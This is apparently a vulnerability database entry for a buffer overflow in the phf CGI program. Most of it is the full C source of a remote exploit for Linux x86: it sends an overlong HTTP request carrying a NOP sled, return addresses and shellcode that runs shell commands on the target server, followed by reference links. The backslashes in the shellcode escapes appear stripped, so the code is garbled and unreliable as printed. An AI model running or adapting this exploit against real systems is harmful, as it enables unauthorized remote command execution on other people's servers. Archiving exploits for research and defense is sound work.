https://www.exploit-db.com/exploits/211
https://www.securityfocus.com/bid/88468
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200101-060

phfCGI程序存在缓冲区溢出漏洞。远程攻击者通过指定大量参数和包括超长MIME头执行任意命令。

/*
 |  phx.c -- phf buffer overflow exploit for Linux-ix86
 |  Copyright (c) 2000 by proton. All rights reserved.
 |
 |  This program is free software; you can redistribute it and/or modify
 |  it under the terms of the GNU General Public License as published by
 |  the Free Software Foundation; either version 2 of the License, or
 |  (at your option) any later version.
 |
 |  This program is distributed in the hope that it will be useful,
 |  but WITHOUT ANY WARRANTY; without even the implied warranty of
 |  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 |  GNU General Public License for more details.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

char    tmp[8192];
char    *host;
char    *progname;

#define output(x) write(1,x,sizeof(x))

unsigned char shellcode[] =
  "GET /cgi-bin/phf?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
  /*
   *  2 pointers, in case of -fomit-frame-pointer
   */
  "x37xfcxffxbf"
  "x37xfcxffxbf"
  " HTTP/1.0n"
  /*
   *  set environment var `HTTP_X'
   */
  "X: "
  /*
   *  a bundle of AAA's, they're just as good as NOP's
   *  but is a tad bit more readable to humans.
   *  512 no-op instructions gives us a nice phat
   *  strike-zone for the above 2 pointers.
   */
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  /*
   *  exploit code
   */
  "xebx3bx5ex8dx5ex10x89x1ex8dx7ex18x89x7ex04x8dx7ex1bx89x7ex08"
  "xb8x40x40x40x40x47x8ax07x28xe0x75xf9x31xc0x88x07x89x46x0cx88"
  "x46x17x88x46x1ax89xf1x8dx56x0cxb0x0bxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xc0xffxffxffx41x41x41x41x41x41x41x41x41x41x41x41x41x41"
  "x41x41"
  /*
   *  try to make sense to the webserver
   */
  "/bin/sh -c echo 'Content-Type: text/plain';echo '';"
  /*
   *  execute something funny!
   */
  "echo Hello! I am running as \"`whoami`\" on a `arch` cpu;"
  "echo Local time is `date` and there are `who|wc -l` users logged in.;"
  "echo '';"
  /*
   *  shellcode will terminate command at the `@'
   */
  "@nn"
  ;

void netpipe(int *rsock, int *wsock)
{
  struct  sockaddr_in sai;
  struct  hostent *he;
  int     s;

  if (!host || !*host)
  {
    printf("Usage: %s <host>n",progname);
    exit(1);
  }
  he = gethostbyname(host);
  if (!he)
  {
    printf("%s: Unknown hostn",host);
    exit(1);
  }

  s = socket(AF_INET,SOCK_STREAM,0);
  sai.sin_family = AF_INET;
  sai.sin_port = htons(80);
  memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

  if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
  {
    switch(errno)
    {
    case ECONNREFUSED:
      output("Connection refused.n");
      break;
    case ETIMEDOUT:
      output("Connection timed out.n");
      break;
    case ENETUNREACH:
      output("Network unreachable.n");
      break;
    default:
      output("Unknown error.n");
      break;
    }
    exit(1);
  }
  *rsock = *wsock = s;
}

int main(int argc, char **argv)
{
  char    *q,*cp;
  int     in,out;
  int     sz,x,n;

  progname = argv[0];
  host = argv[1];

  netpipe(&in,&out);
  write(out,shellcode,sizeof(shellcode));
  output("nCome to papa!nn");

  n = x = 0;
  for(;;)
  {
    sz = read(in,&tmp[x],512-x);
    if (sz < 1)
      break;
    x += sz;
    q = cp = tmp;
    for(sz=x;sz;)
    {
      if (*q == 'n')
      {
        write(1,cp,(q-cp)+1);
        cp = q + 1;
      }
      q++;
      sz--;
    }
    if (cp != tmp)
    {
      sz = x - (cp - tmp);
      memcpy(tmp,cp,sz);
      x -= (cp - tmp);
    }
  }
  exit(0);
}


// milw0rm.com [2000-12-01]

Phf Phf 0

来源:BUGTRAQ
名称:20001115Exploit:phfbufferoverflow(CGI)
链接:http://archives.neohapsis.com/archives/bugtraq/2000-11/0221.html
来源:XF
名称:phf-cgi-bo(5970)
链接:http://xforce.iss.net/static/5970.php